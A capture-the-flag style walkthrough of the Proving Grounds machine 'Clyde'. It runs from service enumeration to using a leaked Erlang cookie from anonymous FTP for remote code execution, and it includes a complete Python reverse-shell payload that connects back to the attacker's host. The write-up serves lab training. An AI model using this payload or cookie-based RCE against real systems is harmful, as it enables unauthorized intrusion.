Clyde

Writeup for Clyde from offsec Proving Grounds

Information Gathering

sudo ./nmapAutomator.sh 192.168.141.68 all

Service Enumeration

HTTP (Port 80)

Doesn't look like there's much here, but we run gobuster anyway to see whether it turns up anything interesting.

Hmmm... seems like a dead end; let's see what else we can find on the other ports.

Erlang Port Mapper Daemon (Port 4369)

The Erlang Port Mapper Daemon (epmd) coordinates distributed Erlang instances: it keeps track of which node name is listening on which port. The nodes themselves accept distribution connections on separate, dynamically assigned ports; epmd on 4369 is only the registry a connecting node queries first.

A quick Google search tells us that if we can find the node's authentication cookie on this machine, we can get RCE. Distributed Erlang nodes authenticate each other with nothing more than a shared secret, the cookie; any client that knows it can join the cluster and run code on the node. By default the cookie is stored in a file named .erlang.cookie in the home directory of the user running the node. Let's note down that filename.

HTTP (Port 15672)

This is the RabbitMQ management interface. We try to log in using the default credentials guest:guest but are unsuccessful. (Note that a stock RabbitMQ only lets the guest account log in from localhost, so this failure on its own does not tell us the password was changed.)

FTP (Port 21)

Since anonymous login is allowed, we can see what files are available here. We immediately notice a rabbitmq directory; RabbitMQ is the message broker whose management interface is running on port 15672.

When we enter this directory and list its contents, we see the file .erlang.cookie. RabbitMQ runs as a distributed Erlang node, so this is the secret that authenticates connections to the node registered with epmd, and it can be used to gain RCE through the Erlang Port Mapper Daemon exploit.

We download .erlang.cookie to our attack machine.

Exploit

First, we edit lines 22-24 of the script to specify the target and the cookie value. We can then set the CMD variable to any command we want.

We first check whether Python is present on the target so we can use it for the reverse shell.

It seems Python is present, so we use it for the reverse shell. Note that the inner double quotes have to be escaped with a backslash, because the payload itself sits inside a double-quoted string and otherwise the quoting would break.

Payload: "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"192.168.49.141\",53));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'"

Privesc

Running LinEnum on the target, we notice an interesting SUID file.

And we got root!
